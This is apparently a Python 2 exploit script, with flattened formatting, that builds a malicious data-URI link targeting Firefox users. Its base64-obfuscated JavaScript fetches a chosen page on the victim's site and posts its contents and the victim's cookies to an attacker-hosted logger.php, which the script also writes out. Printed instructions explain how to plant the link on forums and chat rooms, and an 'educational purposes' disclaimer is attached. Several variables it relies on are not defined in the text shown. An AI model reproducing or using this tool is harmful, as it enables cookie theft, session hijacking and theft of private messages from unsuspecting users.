def ColourMe(txt,colour): opsys = platform.system() if (opsys=="Linux"): from termcolor import colored return colored(txt,colour) else: return txt
def PrepareLink(i1,i2,i3,i4): stealer=base64.b64decode("ZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoIm1uaCIpLnJlbW92ZSgpO3ZhciBCYXNlNjQ9e19rZXlTdHI6IkFCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWFlaYWJjZGVmZ2hpamtsbW5vcHFyc3R1dnd4eXowMTIzNDU2Nzg5Ky89IixlbmNvZGU6ZnVuY3Rpb24oZSl7dmFyIHQ9IiI7dmFyIG4scixpLHMsbyx1LGE7dmFyIGY9MDtlPUJhc2U2NC5fdXRmOF9lbmNvZGUoZSk7d2hpbGUoZjxlLmxlbmd0aCl7bj1lLmNoYXJDb2RlQXQoZisrKTtyPWUuY2hhckNvZGVBdChmKyspO2k9ZS5jaGFyQ29kZUF0KGYrKyk7cz1uPj4yO289KG4mMyk8PDR8cj4+NDt1PShyJjE1KTw8MnxpPj42O2E9aSY2MztpZihpc05hTihyKSl7dT1hPTY0fWVsc2UgaWYoaXNOYU4oaSkpe2E9NjR9dD10K3RoaXMuX2tleVN0ci5jaGFyQXQocykrdGhpcy5fa2V5U3RyLmNoYXJBdChvKSt0aGlzLl9rZXlTdHIuY2hhckF0KHUpK3RoaXMuX2tleVN0ci5jaGFyQXQoYSl9cmV0dXJuIHR9LGRlY29kZTpmdW5jdGlvbihlKXt2YXIgdD0iIjt2YXIgbixyLGk7dmFyIHMsbyx1LGE7dmFyIGY9MDtlPWUucmVwbGFjZSgvW15BLVphLXowLTkrLz1dL2csIiIpO3doaWxlKGY8ZS5sZW5ndGgpe3M9dGhpcy5fa2V5U3RyLmluZGV4T2YoZS5jaGFyQXQoZisrKSk7bz10aGlzLl9rZXlTdHIuaW5kZXhPZihlLmNoYXJBdChmKyspKTt1PXRoaXMuX2tleVN0ci5pbmRleE9mKGUuY2hhckF0KGYrKykpO2E9dGhpcy5fa2V5U3RyLmluZGV4T2YoZS5jaGFyQXQoZisrKSk7bj1zPDwyfG8+PjQ7cj0obyYxNSk8PDR8dT4+MjtpPSh1JjMpPDw2fGE7dD10K1N0cmluZy5mcm9tQ2hhckNvZGUobik7aWYodSE9NjQpe3Q9dCtTdHJpbmcuZnJvbUNoYXJDb2RlKHIpfWlmKGEhPTY0KXt0PXQrU3RyaW5nLmZyb21DaGFyQ29kZShpKX19dD1CYXNlNjQuX3V0ZjhfZGVjb2RlKHQpO3JldHVybiB0fSxfdXRmOF9lbmNvZGU6ZnVuY3Rpb24oZSl7ZT1lLnJlcGxhY2UoL3JuL2csIm4iKTt2YXIgdD0iIjtmb3IodmFyIG49MDtuPGUubGVuZ3RoO24rKyl7dmFyIHI9ZS5jaGFyQ29kZUF0KG4pO2lmKHI8MTI4KXt0Kz1TdHJpbmcuZnJvbUNoYXJDb2RlKHIpfWVsc2UgaWYocj4xMjcmJnI8MjA0OCl7dCs9U3RyaW5nLmZyb21DaGFyQ29kZShyPj42fDE5Mik7dCs9U3RyaW5nLmZyb21DaGFyQ29kZShyJjYzfDEyOCl9ZWxzZXt0Kz1TdHJpbmcuZnJvbUNoYXJDb2RlKHI+PjEyfDIyNCk7dCs9U3RyaW5nLmZyb21DaGFyQ29kZShyPj42JjYzfDEyOCk7dCs9U3RyaW5nLmZyb21DaGFyQ29kZShyJjYzfDEyOCl9fXJldHVybiB0fSxfdXRmOF9kZWNvZGU6ZnVuY3Rpb24oZSl7dmFyIHQ9IiI7dmFyIG49MDt2YXIgcj1jMT1jMj0wO3doaWxlKG48ZS5sZW5ndGgpe3I9ZS5jaGFyQ29kZUF0KG4pO2lmKHI8MTI4KXt0Kz1TdHJpbmcuZnJvbUNoYXJDb2RlKHIpO24rK31lbHNlIGlmKHI+MTkxJiZyPDIyNCl7YzI9ZS5jaGFyQ29kZUF0KG4rMSk7dCs9U3RyaW5nLmZyb21DaGFyQ29kZSgociYzMSk8PDZ8YzImNjMpO24rPTJ9ZWxzZXtjMj1lLmNoYXJDb2RlQXQobisxKTtjMz1lLmNoYXJDb2RlQXQobisyKTt0Kz1TdHJpbmcuZnJvbUNoYXJDb2RlKChyJjE1KTw8MTJ8KGMyJjYzKTw8NnxjMyY2Myk7bis9M319cmV0dXJuIHR9fQ0KdmFyIHhociA9IG5ldyBYTUxIdHRwUmVxdWVzdCgpOw0KeGhyLm9ucmVhZHlzdGF0ZWNoYW5nZSA9IGZ1bmN0aW9uKCkgew0KICAgIGlmICh4aHIucmVhZHlTdGF0ZSA9PSBYTUxIdHRwUmVxdWVzdC5ET05FKSB7DQp2YXIgeGhyMiA9IG5ldyBYTUxIdHRwUmVxdWVzdCgpOw0KeGhyMi5vcGVuKCJQT1NUIiwgIg==")+i1+base64.b64decode("IiwgdHJ1ZSk7DQp4aHIyLnNldFJlcXVlc3RIZWFkZXIoIkNvbnRlbnQtVHlwZSIsICJhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQiKTsNCnhocjIuc2VuZCgiZGF0YT0iK0Jhc2U2NC5lbmNvZGUoeGhyLnJlc3BvbnNlVGV4dCkrICImY29va2llcz0iK2RvY3VtZW50LmNvb2tpZSk7DQogICAgfQ0KfQ0KeGhyLm9wZW4oIkdFVCIsICI=")+i2+base64.b64decode("IiwgdHJ1ZSk7DQp4aHIuc2VuZChudWxsKTs=") BadIMGTag="<img id='mnh' src='d:s' style='display: none;' onerror='"+stealer+"'>" HTMLCode="<html><body onload='window.opener.document.body.innerHTML+=atob("+'"'+base64.b64encode(BadIMGTag)+'"'+");document.location=atob("+'"'+base64.b64encode(i4)+'"'+");'>"+'</body></html>' print ColourMe("\n\n"+happyman1+"\n\n","green") print ColourMe('The malicious link is here:',"cyan") print '============================\n<a target="_blank" href="data:text/html;base64,'+base64.b64encode(HTMLCode)+'">'+i3+'</a>\n============================' print '\nInject this link to the page of forums,Websites,Chat-rooms,... that allows you to insert Pop-up/new_tab link tags.If a firefox user clicks on it,his cookies and sensitive informations will be saved on your web host(in the folder that you uploaded logger.php).Note:All Firefox-based browsers are vulnerable.This Exploit does not affect IE,Chrome.Other browsers such as Opera,Safari,...may be vulnerable.I don'+"'"+'t know.You should test it!\n\n\n'+'Injection methods:\n\n1-HTML Link tag injection:\nIf you can insert a link tag you should paste the copied link element to a page and submit it\n\n2-Injection by Link adder tools:\nSome forums,chat-rooms,... don'+"'t "+'allow you to insert html link tags.So you should create a link with the fallowing properties and submit it:\nLabel:'+i3+'\nAddress or href:data:text/html;base64,'+base64.b64encode(HTMLCode)+'\ntarget(must be pop up or new tab link):_blank'+'\n\n加油!再见.\n'+base64.b64decode("KCAgX19fIFwgfFwgICAgIC98KCAgX19fXyBcKCApDQp8ICggICApICkoIFwgICAvICl8ICggICAgXC98IHwNCnwgKF9fLyAvICBcIChfKSAvIHwgKF9fICAgIHwgfA0KfCAgX18gKCAgICBcICAgLyAgfCAgX18pICAgfCB8DQp8ICggIFwgXCAgICApICggICB8ICggICAgICAoXykNCnwgKV9fXykgKSAgIHwgfCAgIHwgKF9fX18vXCBfIA0KfC8gXF9fXy8gICAgXF8vICAgKF9fX19fX18vKF8pDQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICA=") def Exploit(): with io.FileIO(os.path.dirname(os.path.realpath(__file__))+"/logger.php", "w") as file: file.write(base64.b64decode(base64Exploit)) logger_link = raw_input("\nlogger.php file was created by this python script in the current folder.\nUpload it to your Web Server,Insert the HTTP address(URL) of file after uploading(for example:http://badhacker.com/folder/to/file/logger.php):") stolen_page = raw_input("\nInsert the URL of the page you want to steal it.You can steal private messages,personal informations,settings,...( this and the link container page MUST have the same origion)(for example:http://victimforum.com/privatemessages.php?page=1):") title = raw_input("\nInsert some text for label of the malicious link(for example:Click Me!):") fake_url = raw_input("\nInsert the URL of the page that victim will visit by your malicious link(for example:https://google.com):") print "\nHere is what you want:\nlogger.php file URL:"+logger_link+"\nPage you want to steal:"+stolen_page+"\nTitle of the malicious link:"+title+"\nFake URL of the malicious link:"+fake_url+"\n\n\n\n\n" correct = raw_input(ColourMe("Is it correct?(","white")+ColourMe("y","green")+ColourMe("/","white")+ColourMe("n","red")+ColourMe("):","white")) while(correct!="y"): if correct=="n": print ColourMe("Sorry.Restart the exploit and try again.\n"+sadman,"red") exit() else: correct = raw_input(ColourMe("Is it correct?(","white")+ColourMe("y","green")+ColourMe("/","white")+ColourMe("n","red")+ColourMe("):","white"))
PrepareLink(logger_link,stolen_page,title,fake_url)
banner="""
#######
# # # ##### # #### # #####
# # # # # # # # # #
##### # # # # # # # # #
# ## ##### # # # # #
# # # # # # # # #
####### # # # ###### #### # #
"""
terms="\n\n这是为教育目的编写的,使用它你自己将付法律责任\n"info="""//Mozilla Firefox很脆弱。利用链接可以窃取敏感信息的用户如cookies或页面与私人信息页面。"""
print ColourMe(banner, 'blue'),info,ColourMe(terms, 'yellow')agree = raw_input(ColourMe("Do you accept this?(","white")+ColourMe("y","green")+ColourMe("/","white")+ColourMe("n","red")+ColourMe("):","white"))while(agree!="y"): if agree=="n": print ColourMe("Sorry.You can't use this exploit.\n"+sadman,"red") exit() else: agree = raw_input(ColourMe("Do you accept this?(","white")+ColourMe("y","green")+ColourMe("/","white")+ColourMe("n","red")+ColourMe("):","white"))print ColourMe("\n\n"+happyman2+"\n\n","green")Exploit()